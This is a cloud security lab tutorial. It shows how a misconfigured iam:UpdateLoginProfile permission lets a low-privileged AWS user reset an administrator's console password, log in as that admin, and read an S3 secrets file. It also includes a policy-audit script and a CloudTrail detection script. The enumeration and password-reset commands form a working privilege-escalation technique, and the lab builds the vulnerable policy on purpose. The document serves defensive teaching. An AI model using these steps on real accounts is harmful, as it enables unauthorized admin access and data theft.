Cloud Security

AWS: IAM UpdateLoginProfile Abuse

Identity and Access Management (IAM) is the foundation of security in every cloud platform. Misconfigurations or over-privileged identities are among the most common causes of cloud breaches, making IAM a prime target for both attackers and defenders.

This hands-on lab demonstrates how a mis-scoped UpdateLoginProfile permission enables console takeover and privilege escalation by resetting a specified IAM user’s console password to gain account access.

Table Of Contents

About IAM UpdateLoginProfile

Lab Setup and Prerequisite

Part 1: IAM Lab Setup

  • Provisioning a Low-Privileged IAM User
  • Provisioning a High-Privileged IAM User
  • Provisioning a User Group with UpdateLoginProfile policy

Part 2: Enumeration and Exploitation

  • Enumerating profile with Python script
  • Set up & Enumeration of profile using AWS CLI
  • IAM UpdateLoginProfile Exploitation

Analysis

Recommendations

Conclusion

About IAM: UpdateLoginProfile

UpdateLoginProfile in AWS changes the password for the specified IAM user. You can use the AWS CLI, the AWS API, or the Users page in the IAM console to change the password for any IAM user.

Lab Setup and Prerequisites:

  1. An AWS Account
  2. VM Kali Linux

If you are new to the AWS platform, it is recommended that you go through the AWS Lab setup here first.

Part 1: IAM Lab Setup

Here are the instructions for setting up the environment. We will access the AWS console and configure the AWS Command Line Interface (CLI).

Users:

igt_sanjeet : Low-privileged user with risky permissions attached

igt_admin : High-privileged user with admin access

Policy name:

update-login-policy

Provisioning a Low-Privileged IAM User

Navigate to IAM > Users, then click Create user to set up a new IAM identity.

Give the user a User name (e.g. igt_sanjeet) and press Next to set permissions.

On Set permissions, choose Add user to group from the Permissions options to configure the igt_sanjeet user's permissions, then press Next.

Create the user as shown.

Click on the user name, i.e. igt_sanjeet.

Create an access key for the user.

Select “Command Line Interface (CLI)” as the use case.

Check the box as shown and proceed.

Click Create access key.

Now download the .csv file containing the Access Key ID and Secret Access Key. Keep these credentials secure.

Provisioning a High-Privileged IAM User

Then, create a powerful IAM user. This user holds the elevated permissions; igt_sanjeet (the low-privileged user) will reset the igt_admin password, sign in as that user, and then pivot to more privileged actions.

Navigate to IAM > Users, then click Create user to set up a new IAM identity.

Enter igt_admin as the user name and click Next.

On Set permissions, select option Attach policies directly. On Permissions policies, search and select “AdministratorAccess”. This policy grants comprehensive control over virtually all AWS services and resources, making it our “high-privileged” target for the lab.

Click Next.

Create the user igt_admin.

Now click on the user igt_admin as shown.

Select Enable console access.

Select the option Autogenerated password and click Enable console access.

Provisioning a User Group with UpdateLoginProfile policy

Go to IAM > User groups > Create group.

Enter update-login-profile as the group name.

Create the group

After creating the group, select its name

Click Add permissions → Create inline policy to define and attach a custom policy directly to the group update-login-profile

Specify permissions in the Policy editor using JSON. Write an inline policy, which is embedded in a single IAM identity (user, group, or role); it will later be used as the escalation path.

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": [
                "iam:UpdateLoginProfile",
                "iam:ListAccessKeys",
                "iam:ListAttachedUserPolicies"
            ],
            "Resource": "arn:aws:iam::904557616514:user/Igt_admin"
        },
        {
            "Effect": "Allow",
            "Action": [
                "iam:ListGroupPolicies",
                "iam:ListPolicies",
                "iam:ListPolicyVersions",
                "iam:ListUserPolicies",
                "iam:ListUsers",
                "iam:ListGroups",
                "iam:ListGroupsForUser",
                "iam:GetPolicy",
                "iam:GetPolicyVersion",
                "iam:GetRole",
                "iam:GetRolePolicy",
                "iam:GetUser",
                "iam:GetUserPolicy",
                "iam:GetGroupPolicy"
            ],
            "Resource": "*"
        },
        {
            "Effect": "Allow",
            "Action": [
                "s3:ListBucket"
            ],
            "Resource": "arn:aws:s3:::igt-bucket"
        },
        {
            "Effect": "Allow",
            "Action": [
                "s3:GetObject"
            ],
            "Resource": "arn:aws:s3:::igt-bucket/*"
        },
        {
            "Effect": "Allow",
            "Action": [
                "s3:ListAllMyBuckets",
                "s3:GetBucketLocation"
            ],
            "Resource": "*"
        }
    ]
}

This is how the policy appears in the Policy editor.

Click Next.

Give the policy details, such as its name update-login-policy, and click Create policy.

The policy is created.

Now, select the group name update-login-profile under User groups and click Add users.

Select the user igt_sanjeet; it is now part of the group update-login-profile.
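Before attaching a policy like the one above, it is worth checking it mechanically for the escalation path this lab relies on. The following Python script is an added example, not code from the original lab: it parses an IAM policy document, reports every Allow statement that grants iam:UpdateLoginProfile or iam:CreateLoginProfile (honouring explicit Deny statements and the iam:* wildcard), and contrasts a cut-down copy of the lab's weak group policy with a hardened variant in which users may only change their own password through iam:ChangePassword scoped to ${aws:username}. The account ID, the reduced policy documents and the function names are assumptions made for this example.

```python
"""Audit IAM policy documents for console-password takeover grants.

Added example, not code from the original lab. It checks policy JSON the
way the lab's inline policy was reviewed by hand: every Allow statement
granting iam:UpdateLoginProfile or iam:CreateLoginProfile is reported with
its resource, so a grant on another user's ARN stands out as an
escalation path. The account ID and the reduced policies are constructed.
"""
import fnmatch
import json

LOGIN_PROFILE_ACTIONS = ("iam:CreateLoginProfile", "iam:UpdateLoginProfile")
ACCOUNT = "111111111111"  # constructed placeholder account ID

# Constructed cut-down copy of the lab's weak group policy.
WEAK_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow",
         "Action": ["iam:UpdateLoginProfile", "iam:ListAccessKeys"],
         "Resource": f"arn:aws:iam::{ACCOUNT}:user/igt_admin"},
        {"Effect": "Allow", "Action": ["iam:ListUsers", "iam:GetUser"],
         "Resource": "*"},
    ],
}

# Hardened variant: listing stays, users may change only their own password
# (iam:ChangePassword on ${aws:username}) and login-profile writes are
# explicitly denied, which IAM evaluates ahead of any Allow.
HARDENED_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["iam:ListUsers", "iam:GetUser"],
         "Resource": "*"},
        {"Effect": "Allow", "Action": "iam:ChangePassword",
         "Resource": f"arn:aws:iam::{ACCOUNT}:user/${{aws:username}}"},
        {"Effect": "Deny", "Action": list(LOGIN_PROFILE_ACTIONS),
         "Resource": "*"},
    ],
}


def _as_list(value):
    """Action and Resource may be a string or a list; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _matches(pattern, value):
    """IAM-style matching: case-insensitive with * and ? wildcards."""
    return fnmatch.fnmatchcase(value.lower(), pattern.lower())


def login_profile_grants(policy):
    """Return (action, resource) pairs the policy effectively allows.

    `policy` is a dict or a JSON string. A grant is dropped when an explicit
    Deny covers the same action with a resource pattern matching the allowed
    resource. Condition blocks and NotAction/NotResource are not evaluated;
    statements using them still need a manual look.
    """
    if isinstance(policy, str):
        policy = json.loads(policy)
    allows, denies = [], []
    for stmt in _as_list(policy["Statement"]):
        actions = _as_list(stmt.get("Action"))
        resources = _as_list(stmt.get("Resource"))
        hits = [a for a in LOGIN_PROFILE_ACTIONS
                if any(_matches(p, a) for p in actions)]
        bucket = denies if stmt.get("Effect") == "Deny" else allows
        bucket.extend((a, r) for a in hits for r in resources)
    return [(a, r) for a, r in allows
            if not any(a == da and _matches(dr, r) for da, dr in denies)]


def classify(resource):
    """Self-service (caller's own user) versus takeover of other users."""
    return "self-service" if resource.endswith("user/${aws:username}") else "takeover"


def audit(policy):
    """One finding line per effective login-profile grant."""
    return [f"{a} on {r}: {classify(r)}" for a, r in login_profile_grants(policy)]


if __name__ == "__main__":
    for name, doc in (("weak", WEAK_POLICY), ("hardened", HARDENED_POLICY)):
        print(name, audit(doc) or ["no login-profile grants"])
```

Run against the weak policy the audit reports a single takeover grant on the igt_admin ARN; against the hardened policy it reports nothing, because the explicit Deny on "*" covers both login-profile actions. A policy that grants iam:* is also caught, since the wildcard matcher expands it to both actions.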

Part 2: Enumeration and Exploitation

Use Case Scenario for UpdateLoginProfile

In real-world scenarios this permission is used for onboarding; in a security lab it is used to demonstrate how misconfigured permissions can lead to privilege escalation.

NOTE:

These are two sides of the same thing, an IAM user’s console password (the “login profile”).

CreateLoginProfile → sets the first console password for a user who does not have one yet. If a login profile already exists, this call fails with “already exists”.

UpdateLoginProfile → changes the existing console password. If no login profile exists yet, this call fails with “no such entity” (see the AWS IAM documentation).

Enumerating profile with Python script

python enumerate-iam.py --access-key AKI*********** --secret-key ISN*************

This Python enumeration confirmed that the low-privileged user igt_sanjeet can list IAM users, groups, buckets and policies, providing the necessary visibility to identify and escalate into higher-privileged accounts.

Set up & Enumeration of profile using AWS CLI

Now set up the AWS CLI with the IAM user’s credentials to interact directly with the AWS environment from the Kali machine.

Set up a profile named igt_sanjeet in AWS CLI.

aws configure --profile igt_sanjeet

Assign the access key ID, secret access key, and default region for that profile.

The following command will retrieve the identity information (UserId, Account ID, ARN) for the currently authenticated user via that profile.

aws sts get-caller-identity --profile igt_sanjeet

The next command lists all IAM groups in the account that the igt_sanjeet profile has permission to see.

It does not filter to only the groups that igt_sanjeet belongs to; it returns every group in the account (unless blocked by permissions).

aws iam list-groups --profile igt_sanjeet

This command will list the names of the inline policies attached to the IAM group update-login-profile. Pay attention to the output enclosed in the red box.

aws iam list-group-policies --group-name update-login-profile --profile igt_sanjeet

Now, this command will retrieve and display the full JSON document of the inline policy named update-login-policy that is attached to the group update-login-profile.

Instead of just showing the policy name (like list-group-policies), it reveals the actual permissions (Effect, Action, Resource) that the policy grants.

aws iam get-group-policy --group-name update-login-profile --policy-name update-login-policy --profile igt_sanjeet

Running this command will list all IAM users in the AWS account that the credentials for the igt_sanjeet profile have permission to see.

aws iam list-users --profile igt_sanjeet

With these two commands, try to list the bucket and its contents:

aws s3 ls --profile igt_sanjeet
aws s3 ls s3://igt-bucket --profile igt_sanjeet

Now, try to download the object with the following command; it will be denied.

aws s3 cp s3://igt-bucket/secrets.txt . --profile igt_sanjeet

The same denial is observed when trying to remove/delete the object with the following command:

aws s3 rm s3://igt-bucket/secrets.txt --profile igt_sanjeet

These actions are denied because the profile igt_sanjeet is not authorized to perform them.

This command updates the console login profile (i.e. sets a new console password) for the IAM user igt_admin.

NOTE: Since igt_admin has the AdministratorAccess policy, whoever controls this password can log in to the AWS Console as a full admin, which in a misconfigured environment is privilege escalation to admin.

aws iam update-login-profile --user-name igt_admin --password 'YourStrongP@ssw0rd!' --no-password-reset-required --profile igt_sanjeet

IAM UpdateLoginProfile Exploitation

Open the AWS Console sign-in page, enter your account ID, the IAM user name igt_admin and the password you set with update-login-profile, then click Sign in.

After login, check the console banner; it should show igt_admin with full access. The user now has administrator privileges through privilege escalation. Click your bucket name (igt-bucket); under Objects you will see a text file secrets.txt. Download the file.

In the Kali terminal, use this command to display the contents of the file; this time it succeeds.

cat /home/kali/Downloads/secrets.txt

Analysis

This hands-on lab walks through a controlled, authorized scenario showing how an attacker with iam:UpdateLoginProfile rights can gain console access to a target account.

Important: only run these steps in accounts/environments you are explicitly authorized to test. Misuse against real customers or without permission is illegal.

Recommendations

  • Deny/limit CreateLoginProfile/UpdateLoginProfile except for a small set of admin/service principals.
  • Enforce MFA and permission boundaries on privileged users.
  • Use automation/secret-management to provision console access rather than manual password resets.
  • Monitor CloudTrail and alert on create/update login events and subsequent console logins.
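The last recommendation can be implemented as a simple CloudTrail correlation. The script below is an added example, not part of the original lab: it reads CloudTrail records (one constructed JSON record per line; a log file delivered to S3 wraps its records in a top-level Records array, so iterate over that array when reading real files), flags every CreateLoginProfile or UpdateLoginProfile call where the caller is not the affected user, and pairs it with the target user's next successful ConsoleLogin within one hour, reporting the source address and whether MFA was used. The user names, IP addresses, timestamps and the one-hour window are constructed for this example.

```python
"""Correlate console-password resets with follow-up console logins in CloudTrail.

Added example, not part of the original lab. Each line of SAMPLE_LOG is one
constructed CloudTrail record using the documented field names (eventName,
userIdentity.userName, requestParameters.userName, responseElements,
additionalEventData.MFAUsed). Users, addresses and the window are made up.
"""
import json
from datetime import datetime, timedelta

PASSWORD_EVENTS = {"CreateLoginProfile", "UpdateLoginProfile"}
LOGIN_WINDOW = timedelta(hours=1)  # assumed window; tune to your environment

# Constructed records: a self-service reset (benign), a cross-user reset
# followed by a failed and then a successful login without MFA, and a
# CreateLoginProfile for another user whose login falls outside the window.
SAMPLE_LOG = """
{"eventTime": "2024-05-01T09:00:00Z", "eventSource": "iam.amazonaws.com", "eventName": "UpdateLoginProfile", "userIdentity": {"type": "IAMUser", "userName": "igt_admin"}, "requestParameters": {"userName": "igt_admin"}, "sourceIPAddress": "198.51.100.7"}
{"eventTime": "2024-05-01T10:00:00Z", "eventSource": "iam.amazonaws.com", "eventName": "UpdateLoginProfile", "userIdentity": {"type": "IAMUser", "userName": "igt_sanjeet"}, "requestParameters": {"userName": "igt_admin", "passwordResetRequired": false}, "responseElements": null, "sourceIPAddress": "203.0.113.5"}
{"eventTime": "2024-05-01T10:03:00Z", "eventSource": "signin.amazonaws.com", "eventName": "ConsoleLogin", "userIdentity": {"type": "IAMUser", "userName": "igt_admin"}, "responseElements": {"ConsoleLogin": "Failure"}, "sourceIPAddress": "203.0.113.5"}
{"eventTime": "2024-05-01T10:04:12Z", "eventSource": "signin.amazonaws.com", "eventName": "ConsoleLogin", "userIdentity": {"type": "IAMUser", "userName": "igt_admin"}, "responseElements": {"ConsoleLogin": "Success"}, "additionalEventData": {"MFAUsed": "No"}, "sourceIPAddress": "203.0.113.5"}
{"eventTime": "2024-05-01T11:00:00Z", "eventSource": "iam.amazonaws.com", "eventName": "CreateLoginProfile", "userIdentity": {"type": "IAMUser", "userName": "igt_sanjeet"}, "requestParameters": {"userName": "igt_ops"}, "sourceIPAddress": "203.0.113.5"}
{"eventTime": "2024-05-01T13:30:00Z", "eventSource": "signin.amazonaws.com", "eventName": "ConsoleLogin", "userIdentity": {"type": "IAMUser", "userName": "igt_ops"}, "responseElements": {"ConsoleLogin": "Success"}, "additionalEventData": {"MFAUsed": "Yes"}, "sourceIPAddress": "198.51.100.7"}
"""


def load_records(text):
    """Parse one JSON record per non-empty line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def _time(rec):
    return datetime.strptime(rec["eventTime"], "%Y-%m-%dT%H:%M:%SZ")


def _user(rec):
    return (rec.get("userIdentity") or {}).get("userName")


def successful_logins(records):
    """ConsoleLogin events whose responseElements report Success."""
    return [r for r in records if r.get("eventName") == "ConsoleLogin"
            and (r.get("responseElements") or {}).get("ConsoleLogin") == "Success"]


def detect_takeovers(records):
    """Flag cross-user password resets and pair them with the target's next login.

    A reset where the caller changes a *different* user's password is always
    reported (severity medium); if that user then signs in to the console
    within LOGIN_WINDOW the finding is raised to high and the login's source
    address and MFA status are attached.
    """
    records = sorted(records, key=_time)
    logins = successful_logins(records)
    findings = []
    for rec in records:
        if rec.get("eventName") not in PASSWORD_EVENTS:
            continue
        target = (rec.get("requestParameters") or {}).get("userName")
        caller = _user(rec)
        if not target or target == caller:
            continue  # self-service reset, or record lacks the target
        reset_at = _time(rec)
        follow = next((l for l in logins if _user(l) == target
                       and reset_at <= _time(l) <= reset_at + LOGIN_WINDOW), None)
        findings.append({
            "actor": caller,
            "target": target,
            "reset_event": rec["eventName"],
            "reset_at": rec["eventTime"],
            "login_at": follow["eventTime"] if follow else None,
            "login_ip": follow.get("sourceIPAddress") if follow else None,
            "mfa_used": (follow.get("additionalEventData") or {}).get("MFAUsed")
            if follow else None,
            "severity": "high" if follow else "medium",
        })
    return findings


if __name__ == "__main__":
    for f in detect_takeovers(load_records(SAMPLE_LOG)):
        print(f"[{f['severity']}] {f['actor']} set password of {f['target']} "
              f"at {f['reset_at']}; login: {f['login_at']} mfa={f['mfa_used']}")
```

On the constructed log the rule produces two findings: a high-severity one for igt_sanjeet resetting igt_admin's password followed four minutes later by a non-MFA console login from the same address, and a medium-severity one for the igt_ops profile creation, whose later login falls outside the window. The self-service reset by igt_admin and the failed login are ignored, which keeps routine password changes out of the alert queue.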

Conclusion

This lab demonstrated how a seemingly low-privileged IAM user with the iam:UpdateLoginProfile permission can reset another user’s console password and gain unauthorized console access. The exercise highlights the critical need to restrict CreateLoginProfile and UpdateLoginProfile to administrators only, and to continuously monitor CloudTrail for such high-impact IAM actions.

Author: Fatima Aziz is an accomplished cybersecurity professional with expertise in cloud security, holding certifications like GPCS and CCSK. Contact Fatima Aziz on LinkedIn.